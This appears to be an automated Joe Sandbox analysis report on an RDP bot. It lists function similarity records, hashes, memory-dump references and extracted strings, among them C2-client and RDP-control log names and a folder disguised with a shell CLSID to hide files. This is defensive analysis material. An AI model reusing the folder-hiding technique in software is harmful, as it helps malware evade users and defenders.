                                                                    • Opcode ID: 4659351e0f4b0f1ae413d9bd91a6490a176d5636e6eab1043b102c9ff44a464a
                                                                    • Instruction ID: eac2e087cf567a368ca926cb5404d6844288ed62180758d3b375b6ec35229ddd
                                                                    • Opcode Fuzzy Hash: 4659351e0f4b0f1ae413d9bd91a6490a176d5636e6eab1043b102c9ff44a464a
                                                                    • Instruction Fuzzy Hash: D0418F76A08F068AEB108F12E84467E27A0FB64BB8F5444B5DD2D677A9DF3CE445D308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                                                    • API String ID: 513531256-4171087551
                                                                    • Opcode ID: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
                                                                    • Instruction ID: 25b8e55b9b5d9e1248065e0b2cae01a9f35a84ad89d6dc0e1b6db369a68b619d
                                                                    • Opcode Fuzzy Hash: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
                                                                    • Instruction Fuzzy Hash: 6641AE21B0C64296F321AB9DE8513BA7391BB84784F540235EB4ECB7B5DF3CE5818780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_strtoui64
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                    • API String ID: 3513630032-2069802722
                                                                    • Opcode ID: 6417065ff4ff75e7bd70312541eff339a187eb95395a5ef457ed19444645fb7e
                                                                    • Instruction ID: bbeb1ae5b25c03b7d4cb05b64fc81fe3dfa10e0039bb7f36c3073a828e8c91ca
                                                                    • Opcode Fuzzy Hash: 6417065ff4ff75e7bd70312541eff339a187eb95395a5ef457ed19444645fb7e
                                                                    • Instruction Fuzzy Hash: A421CC22A08F4686E7218F96FC407AA3369BB497A4F4840B6EE4C47770DF7CD885C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_strtoui64
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                    • API String ID: 3513630032-2069802722
                                                                    • Opcode ID: 3f6a0b15f8ca91d918480fae1623ca515a98658efb4e61b5bea6a53a6314fc42
                                                                    • Instruction ID: 38f902bf758e15e609f3a083d0efe2dd3d88ff53d42f31eab04d1e15d5b6924f
                                                                    • Opcode Fuzzy Hash: 3f6a0b15f8ca91d918480fae1623ca515a98658efb4e61b5bea6a53a6314fc42
                                                                    • Instruction Fuzzy Hash: 8D21BC22A08E86DAE7109F57F8407AA7764BBA47A4F444072EE6C27775CF3CE845C704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_strtoui64
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                    • API String ID: 3513630032-2069802722
                                                                    • Opcode ID: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
                                                                    • Instruction ID: 2af4fb2fc3beef764780ee551f62c638ddbc67e40f08003402780adadefd688d
                                                                    • Opcode Fuzzy Hash: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
                                                                    • Instruction Fuzzy Hash: 3C215762A08B4796E6329F19F8407AA33A4EB85794F444032EEDC477B5DF3CE985CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_strtoui64
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                    • API String ID: 3513630032-2069802722
                                                                    • Opcode ID: 4ffbc5754ca2a88e4da89b9ce7d12ca71ab39645e176c06b388d4c6af5cf53aa
                                                                    • Instruction ID: b7819177722fb4ee3b91a0a767050e560c01d50c63999313dc036d0a2a5bb22e
                                                                    • Opcode Fuzzy Hash: 4ffbc5754ca2a88e4da89b9ce7d12ca71ab39645e176c06b388d4c6af5cf53aa
                                                                    • Instruction Fuzzy Hash: EB214622A08A8796E6619F15E8407EA33A4FB54798F544132EECD47779EF3CE985CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_strtoui64
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                    • API String ID: 3513630032-2069802722
                                                                    • Opcode ID: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                                                                    • Instruction ID: 4d6befd22f571c38c7dcc0dec290d0a0c7401fb3fcfd9dd79d7f4772616c2862
                                                                    • Opcode Fuzzy Hash: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                                                                    • Instruction Fuzzy Hash: FA217A22A08A86A9E6119F55FC807AA7361FB85788F448032EE8C47774DF3ED985C702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_strtoui64
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                    • API String ID: 3513630032-2069802722
                                                                    • Opcode ID: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
                                                                    • Instruction ID: a0f4585151e7d89a01ac7b80dbb5c4765a4e07935952c2e35098b0c435e8e8c3
                                                                    • Opcode Fuzzy Hash: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
                                                                    • Instruction Fuzzy Hash: 6A21AB62A08A8795E7109F59F8407AA7361FB88B88F444033EECD47675DF3CE949C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                    • API String ID: 1004003707-2568489879
                                                                    • Opcode ID: 7d520cff398a984ea8688f066155e03d6f99e8cd0eccc00a71914ee201134051
                                                                    • Instruction ID: 0349c5dfaae0b6439ed535a59382ed0262286e983d2572cd900bcd030cb87bf3
                                                                    • Opcode Fuzzy Hash: 7d520cff398a984ea8688f066155e03d6f99e8cd0eccc00a71914ee201134051
                                                                    • Instruction Fuzzy Hash: 16418FA1A08E47E9FA248B43E9017F82360BF64374F4441B6DA7C665B6DF7DEA45C308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                    • API String ID: 1004003707-2568489879
                                                                    • Opcode ID: e613a4d6a4c68f407f0f19450277476f0728d1ddb465450c7adc01a39230389b
                                                                    • Instruction ID: d7303eaa73cbf4865c15a0d2a3a7dbe79c3125382001618350db4ca00d1dbb7b
                                                                    • Opcode Fuzzy Hash: e613a4d6a4c68f407f0f19450277476f0728d1ddb465450c7adc01a39230389b
                                                                    • Instruction Fuzzy Hash: DA412761A0D65791FA758F98E9403F42360BB14358F844532DADD462BEFF3CEA49CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                    • API String ID: 1004003707-3977765790
                                                                    • Opcode ID: 973422c728677154eece02d56bbef35a34d318f288ef4d77e120ecefbc4c514b
                                                                    • Instruction ID: 067e13ea8ab240dddd25aaf7a9333334aadeae5a7a664d5f61466a21056bfd09
                                                                    • Opcode Fuzzy Hash: 973422c728677154eece02d56bbef35a34d318f288ef4d77e120ecefbc4c514b
                                                                    • Instruction Fuzzy Hash: 084164A1A08E47E9FA208B12F8017F82611BF64378F4441B6DA6C2A5B6DF7CE546C308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                    • API String ID: 1004003707-3977765790
                                                                    • Opcode ID: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
                                                                    • Instruction ID: ab49d71ce59add776440cfaa352fa51808657bed9c795a525127525b74806d73
                                                                    • Opcode Fuzzy Hash: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
                                                                    • Instruction Fuzzy Hash: 75413AA2A09747D1FA359F54E8403F463A0FF40748F488532EA9D5A5F5EF7CA989CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                    • API String ID: 1004003707-3977765790
                                                                    • Opcode ID: 6c6f481a4ffe8623e0882f049edd88d4a5de71fec80fc19a5a7b52b7f6d98842
                                                                    • Instruction ID: bde5095a396633b0b301021f83e4fe142469f943317a2b3ccfb1ebbbed61b827
                                                                    • Opcode Fuzzy Hash: 6c6f481a4ffe8623e0882f049edd88d4a5de71fec80fc19a5a7b52b7f6d98842
                                                                    • Instruction Fuzzy Hash: 67411A61E0C65795FA728F54E8417F42360AB20398F445533DACE4A6BAEE3CE54ACB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                                                    • API String ID: 39653677-1686225151
                                                                    • Opcode ID: 991dd80c700aa1ae76ec81c81c963b3872b3b5c0a8959d8b97ae4b1278808ee7
                                                                    • Instruction ID: e076fba3db31b208f69605e6508bab6ab4acc2978b56f816058f258cbab96700
                                                                    • Opcode Fuzzy Hash: 991dd80c700aa1ae76ec81c81c963b3872b3b5c0a8959d8b97ae4b1278808ee7
                                                                    • Instruction Fuzzy Hash: 3721C512A48B43A5FB256AAD591437D37914F597CCF084230EB4EDB3A2DE2CE85483C0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                                                    • API String ID: 513531256-3034662401
                                                                    • Opcode ID: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                                                                    • Instruction ID: b776ba94bfd13357d3ec6570badcb94ea47f16415f835727423387926bc860ed
                                                                    • Opcode Fuzzy Hash: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                                                                    • Instruction Fuzzy Hash: 34415F61A0CA4186F322EB52E8543FE73AAFB887A0F540075DA4D47BB5DF2CE5468741
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                                                    • API String ID: 513531256-1680544107
                                                                    • Opcode ID: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                                                                    • Instruction ID: 4975a21258dca3bda3a6befafda07c5c970e183ed2a1c9efe8bfc6bf053b5280
                                                                    • Opcode Fuzzy Hash: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                                                                    • Instruction Fuzzy Hash: F2417E21A0CE418EF320DB12E8547AE7750FBA47A0F4401B1DA5D6B7A6CF3DE596874C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
                                                                    • API String ID: 513531256-1022500615
                                                                    • Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                                                                    • Instruction ID: f3c1ae03af07e628172fc752b1c7a554f0c613b1a057ac218881e9cab8e22ad9
                                                                    • Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                                                                    • Instruction Fuzzy Hash: 2C416E72A0CA8686F731AF55E8543B933A1FB88780F440131DA8D477B6CF6CE5858F40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
